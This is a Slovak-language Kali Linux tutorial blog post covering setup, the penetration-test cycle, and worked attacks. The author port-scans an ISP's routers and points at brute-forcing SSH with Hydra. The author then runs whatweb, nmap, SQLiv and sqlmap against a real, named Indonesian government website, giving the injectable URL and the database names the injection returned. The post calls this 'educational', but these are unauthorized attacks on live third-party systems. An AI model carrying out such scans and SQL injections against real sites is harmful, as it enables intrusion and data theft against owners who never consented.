Kali Linux Tutorial

Kali Linux Tutorial



Ak ste odborníkom alebo aspoň poznáte Linux, príkazy a prostredie, práve ste si nainštalovali Kali Linux na svoj počítač, chceli ste sa stať majstrom Kali Linuxu alebo etickým hackerom, ste na správnom mieste. V tomto článku sa budem zaoberať tutoriálom Kali Linux pre používateľov Linuxu, ktorí s Kali ešte nie sú oboznámení, a zoznámime sa s niektorými základnými technikami používanými pri hackovaní a testovaní zabezpečenia pri používaní Kali.

Čo je Kali Linux?

Kali Linux, ( Prvýkrát bol vydaný 13. marca 2013 ), ktorá bola formálne známa ako BackTrack, vyvinutá bezpečnostnou spoločnosťou Offensive Security, je forenzná a na bezpečnosť zameraná distribúcia založená na testovacej vetve Debianu. Kali Linux je navrhnutý s prihliadnutím na penetračné testovanie, obnovu dát a detekciu hrozieb. Tento projekt prešiel začiatkom tohto roka na model postupného vydania v snahe poskytnúť užívateľom distribúcie aktuálnejšie bezpečnostné nástroje. Kali Linux je bezplatný a vždy bude. Obsahuje 600+ nástrojov penetračného testovania.







Prečo Kali Linux? Je to pre teba to pravé?

Kali Linux si v poslednej dobe získal veľkú popularitu. A je za tým dôvod. Hacking je späť ako skvelá vec, ktorú môžete urobiť v populárnej kultúre, a to možno výrazne pripísať televíznemu seriálu Mr. Robot. Popularita pána Robota pomohla Kali Linuxu získať nových používateľov. Ľudia, ktorí takmer vôbec nevedia o Linuxe alebo o čomkoľvek, čo súvisí s počítačovou bezpečnosťou, sa teraz pokúšajú používať Kali ako svoju hlavnú distribúciu Linuxu.



Naša najpokročilejšia distribúcia testovania penetrácie. - Vývojári systému Kali Linux. (Je to napísané na hlavnej stránke Kali.org v hornej časti stránky.) Čo z toho vyhlásenia získate? Všimli ste si toho: APTD (Advanced Penetration Testing Distribution)? Slovo hacking tu neexistuje doslova. Kali Linux je rovnaký ako ostatné distribúcie Linuxu. Jednoducho povedané, je to distribúcia Linuxu nabitá nástrojmi súvisiacimi so zabezpečením a zameraná na odborníkov na bezpečnosť siete a počítača. Používanie systému Kali Linux sa však zameriava iba na bezpečnosť a kriminalistiku.



Linuxová distribúcia nie je nič iné ako balík obsahujúci jadro Linuxu, sadu základných pomocných programov a aplikácií a niektoré predvolené nastavenia. Kali Linux teda neponúka niečo jedinečné v tomto zmysle, väčšinu poskytovaných nástrojov je možné nainštalovať do akejkoľvek distribúcie Linuxu.





Kali Linux je špeciálne navrhnutý tak, aby spĺňal požiadavky profesionálneho penetračného testovania a bezpečnostného auditu. Je zameraný na konkrétnu podskupinu používateľov Linuxu. Pentestery, hackeri atď. Nie je to odporúčaná distribúcia, ak očakávate Kali pre univerzálne desktopy Linux pre vývoj, web design, hry, kanceláriu atď. Kali vám môže priniesť určité problémy, aj keď ste skúsený používateľ Linuxu .

ČO ROBIŤ PO INŠTALÁCII KALI LINUX

Po inštalácii systému Kali Linux vás môže zaujímať, čo s tým ďalej robiť, však ?. Každý sa stretáva s týmto problémom, nebojte sa.



KROK 1: ZARIADENIE REPOZITORU

Po prvé, možno to už viete, ale je dôležité správne nastaviť úložisko. Ako som už povedal, model postupného vydania systému Kali Linux je v snahe poskytnúť používateľom distribúcie aktualizovanejšie bezpečnostné nástroje. Spravidla platí, že ak máte Kali Linux čerstvo nainštalovaný, archív odkazuje na médium, ktoré používate na inštaláciu. Ak to chcete opraviť, musíte zmeniť úložisko na oficiálne úložisko Kali Linux. Potrebný súbor sa nachádza pod /etc/apt/sources.list . Otvorte súbor pomocou textového editora leafpad a nahraďte predvolené úložisko týmto oficiálnym archívom Kali Rolling:

deb http://http.kali.org/kali kali-rolling main contrib non-free # For source package access, uncomment the following line # deb-src http://http.kali.org/kali kali-rolling main contrib non-free 

KROK 2: AKTUALIZUJTE A UPGRADUJTE SVOJ KALI LINUX

Po tejto aktualizácii a aktualizácii systému synchronizujte svoj Kali Linux s najnovšou verziou. Ak to chcete urobiť, otvorte terminál a zadajte:

apt update -y && apt upgrade -y && apt dist-upgrade 

Príkaz apt update stiahne a vyberie informácie o balíkoch z úložísk a aktualizuje ich, aby získal informácie o najnovších verziách balíkov a ich závislostiach.

Príkaz apt upgrade stiahne a nainštaluje novšiu verziu balíkov nainštalovaných balíkov Kali Linux, pokiaľ neobsahuje chyby v závislostiach.

Vhodná aktualizácia na diaľku aktualizuje všetky balíky na najnovšiu dostupnú verziu bez ohľadu na to. A tiež podľa potreby nainštalujte a odstráňte závislosti (nainštalujte závislosti na uspokojenie balíkov, samozrejme, ale tiež odstráňte závislosti, ktoré osireli, ak aktualizovaný balík už nepotreboval závislosť.

ZÁKLADNÁ KONCEPCIA TESTOVANIA PENETRÁCIE S KALI LINUX

Potom, čo ste úspešne vykonali tieto kroky, existujú tri hlavné veci, ktoré môžete urobiť s Kali Linuxom na základe cieleného systému, vrátane:

  1. Hackovanie v bezdrôtovej sieti - Wifi hacking, Phising, ARP Otrava, atď.
  2. Hackovanie webových aplikácií -Vkladanie SQL, falšovanie požiadaviek na rôzne weby (CSRF), phishing na webe atď.
  3. Hackovanie zariadenia - Využite cieľový stroj, aby ste nad ním získali kontrolu.

Nezahŕňam hackovanie internetu vecí, to neznamená, že Kali Linux na tento účel nemá žiadne schopnosti. Ale doslova to môže patriť aj hackovaniu zariadení. Pretože zariadenie má fyzický vzhľad a formu. V tomto návode som pokryl ich základné znalosti. Pretože je Kali Linux obrovský, nezmestí sa do jedného článku!

Musíte tiež vedieť, cyklus alebo postup testovania penetrácie. Oni sú:

  1. Reconnaissance - zhromažďovanie informácií
  2. Skenovanie
  3. Prevádzka
  4. Po vykorisťovaní

BEZDRÁTOVÉ SIEŤOVÉ HACKOVANIE S KALI LINUX

Pokiaľ ide o hackovanie bezdrôtovej siete, obeť sa môže líšiť. Pretože bezdrôtové siete pozostávajú z niekoľkých vecí, ako napríklad ISP (poskytovateľ internetových služieb), router a jeho partneri (modem, rozbočovač, prepínač atď.) A klienti (používatelia, CCTV, vzdialený počítač atď.). Majú tiež zraniteľné možnosti.

Internet je rozsiahla a komplexná agregácia sieťového hardvéru prepojená bránami. Sledovanie trasy, ktorou sa vaše pakety uberajú, je dôležité vedieť, ako sa dostanete k určitému názvu hostiteľa alebo cieľovej adrese IP.

Kali Linux má vstavaný nástroj s názvom Traceroute. Traceroute využíva čas protokolu IP na živé pole a pokúša sa vyvolať odpoveď ICMP TIME_EXCEEDED z každej brány pozdĺž cesty k nejakému hostiteľovi. Traceroute sa pokúša vystopovať trasu, ktorou by IP paket prešiel k nejakému internetovému hostiteľovi, spustením paketov sond s malým TTL (time to live) a následným počúvaním ICMP prekročeného času odpovede z brány. Dám vám a príklad, ako vysledovať router ISP používaný na zvládnutie nášho pripojenia pomocou Traceroute.

1. Uznanie

Zhromažďovanie informácií je najdôležitejším skokovým štartom, tento krok si nenechajte ujsť. V tomto kroku je naším cieľom získať čo najviac užitočných informácií, ktoré by sme mohli získať, a potom sa tieto informácie použijú na ďalšie kroky.

Najprv otvorte terminál a zadaním tohto príkazu spustíte trasovanie cesty na web. V tomto prípade nastavím web na google.com.

traceroute google.com 

Snímka obrazovky Traceroute

2. Skenovanie

Akonáhle spustíme príkazy, uvedie v poradí, kam náš paket ide. Ako vidíte vyššie, dostal som 3 skoky, z ktorých jeden je môj server ISP. Prvá adresa IP v zozname je môj smerovač, ktorý funguje ako brána. A ďalšie dva z nich patria môjmu ISP. Teraz sa pozrime na službu, ktorú používajú, pomocou Nmap. Ciele, ktoré sa chystáme skenovať, teda sú 10.152.192.1 a 10.13.223.102 . Na termináli som spustil nasledujúci príkaz:

nmap -v -sS [IP Target] -Pn 

Rozoberme argument príkazu:

-v = Povoliť režim výrečnosti

-sS = Použiť skenovaciu techniku ​​TCP SYN

-Pn = Považujte všetkých hostiteľov za online -preskočte objavovanie hostiteľov

A tu je výsledok, ktorý sme dosiahli.

snímka obrazovky nmap 2

Bohužiaľ sú zapnuté všetky porty 10.152.192.1 sú filtrované, to znamená, že všetky prichádzajúce pripojenia TCP sú na tejto IP adrese blokované systémom IDS alebo bránou firewall. Teraz urobme ďalšie skenovanie k druhému cieľu.

snímka obrazovky nmap 1

3. Prevádzka

Pri tomto postupe nemám v úmysle vykonávať skutočné vykorisťovanie, namiesto toho vám ukážem, ako na to. Na základe vyššie uvedeného výsledku skenovania Nmap vieme, že táto adresa IP má server SSH spustený na porte 22 a je otvorený. Je otvorené byť brutálne vynútený, haha! Našli sme dieru, tento server SSH je možnou dierou, do ktorej by sme sa mohli pokúsiť získať prístup. V systéme Kali Linux existuje niekoľko nástrojov, ktoré podporujú útoky bruteforce alebo slovníka proti protokolu SSH. Jednou z najobľúbenejších a najsilnejších je Hydra.

Ok, to bol základný postup vykonávania penetračného testu proti cielenému serveru, ktorým je v tomto prípade môj server ISP.

WEBOVÉ APLIKÁCIE HACKING S KALI LINUX

Ak vás to vášnivo baví, môžete si svoje hackerské prostredie nastaviť tak, že si do systému Kali Linux nainštalujete DWVA (Damn Vulnerable Web App). Jedná sa o webovú aplikáciu PHP/MySQL, ktorá má veľa zraniteľných dier. Jeho hlavným cieľom je byť pomôckou pre profesionálov v oblasti bezpečnosti, aby si vyskúšali svoje schopnosti a nástroje v právnom prostredí, a pomôcť vývojárom webu lepšie porozumieť procesom zabezpečenia webových aplikácií. DWVA môžete získať zadarmo na Github tu: https://github.com/ethicalhack3r/DVWA.

Teraz vám ukážem, ako robiť hackovanie webových aplikácií na skutočnom webe. Ale sľubuj mi, že je to obmedzené iba na vzdelávacie účely. Simulujeme skutočný útok na reálnom webe pomocou injekcie SQL.

Predpoklad

Pokryté nástroje:

-Whatweb (predinštalovaný)

-Nmap (predinštalovaný)

- SQLiv (nainštalovať ručne)

-SQLMap (predinštalovaný)

Potrebujeme ešte jeden ďalší nástroj, ktorý je k dispozícii na Github tu: https://github.com/Hadesy2k/sqliv, nainštalujte ho najskôr do nášho Kali Linuxu. Tento nástroj s názvom SQLiv je schopný vykonávať cielené skenovanie poskytnutím konkrétnej domény (s prehľadávaním). Zadajte terminál:

git clone https://github.com/Hadesy2k/sqliv.git cd sqliv && sudo python2 setup.py -i 

Cieľ: www.trenggalekkab.go.id

1. Uznanie

Zbierajte čo najviac užitočných informácií. Mohli by sme otvoriť webovú stránku a zistiť, ktorá aplikácia na tomto webe beží. Najprv sa pozrime, o aký web sa jedná. Na to použijeme webovú stránku.

whatweb www.trenggalekkab.go.id 

Aký webový screenshot

Ako vidíte vyššie, cieľ sa nachádza v Indonézii. Beží Apache v2.2.27 na svojom webovom serveri a tiež má PHP v5.4.31 , má IP adresu 103,247,21.142 . Dobre, všimnite si to. Možno budete musieť navštíviť jeho webovú stránku a vyhľadať vytvorený súbor alebo stránku, parametre adresy URL alebo dokonca prihlasovací formulár. Túto IP adresu zatiaľ potrebujeme pre ďalší krok, ktorým je skenovanie.

2. Skenovanie

Rovnako ako predtým znova použijeme Nmap na skenovanie portov a služieb, ktoré bežia na cieli.

nmap -v -sS 103.247.21.142 

A tu je výsledok, ktorý sme získali:

Completed SYN Stealth Scan at 21:22, 261.93s elapsed (1000 total ports) Nmap scan report for ip-103-247-21-142.wifian.net.id (103.247.21.142) Host is up (0.069s latency). Not shown: 985 closed ports PORT STATE SERVICE 21/tcp open ftp 25/tcp open smtp 53/tcp open domain 80/tcp open http 110/tcp open pop3 111/tcp open rpcbind 143/tcp open imap 212/tcp open anet 443/tcp open https 465/tcp open smtps 587/tcp open submission 993/tcp open imaps 995/tcp open pop3s 3128/tcp filtered squid-http  3306/tcp open mysql  

Existuje veľa otvorených portov, ktoré zvládajú každú službu v cieli, ale ten, ktorý vyzerá pútavo, je služba mysql na porte 3306. Je uvedené, že táto stránka používa mysql spravovať ich informácie v databázach. Potom ma zaujíma, či na tomto webe existujú chyby zabezpečenia týkajúce sa injekcie SQL. Stránku teda znova naskenujem pomocou programu SQLiv, ktorý sme práve nainštalovali. Napísal som príkaz:

sqliv -t www.trenggalekkab.go.id 

SQLHacking ScreenShot1

Na tomto webe sme našli 2 možné adresy URL citlivé na SQL. Poznamenajte si tieto adresy URL.

3. Prevádzka

Ok, máme adresy URL citlivé na SQL a pripravené na spustenie. Na to použijeme SQLMap. Syntax je:

sqlmap [Vulnerable URL] --dbs 

Príkaz by mal vyzerať takto:

 sqlmap -u "http://www.trenggalekkab.go.id/berita.php?page=208" --dbs 

Argument –dbs je povedať SQLMapu, aby získal cieľové databázy. Tu je výstup, ktorý sme získali:

[INFO] the back-end DBMS is MySQL web application technology: PHP 5.4.31, Apache 2.2.27 back-end DBMS: MySQL 5 [21:46:04] [INFO] fetching database names [21:46:04] [INFO] the SQL query used returns 2 entries [21:46:04] [INFO] resumed: information_schema [21:46:04] [INFO] resumed: trengkab_trg available databases [2]: [*] information_schema [*] trengkab_trg 

SQLMap našiel 2 databázy, ale iba jednu z nich, ktorá obsahuje citlivé údaje, ako napríklad účet poverenia správcu. To je na trengkab_trg. Potom, čo sme našli databázy, je tu ešte jeden krok, ktorý by sme mali urobiť. To je nájsť tabuľky a stĺpce a posledným krokom je výpis dát. V tejto sekcii vám pomocou tohto cieľa neukážem, ako na to. Aspoň poznáte základnú myšlienku útočného cyklu a používanie niektorých nástrojov.

HACKOVANIE ZARIADENIA

V budúcom článku na tomto webe sa budeme zaoberať hackovaním zariadení, zostaňte naladení. Ako predbežné varovanie sa budete chcieť uistiť, že na to poznáte nejaký Python.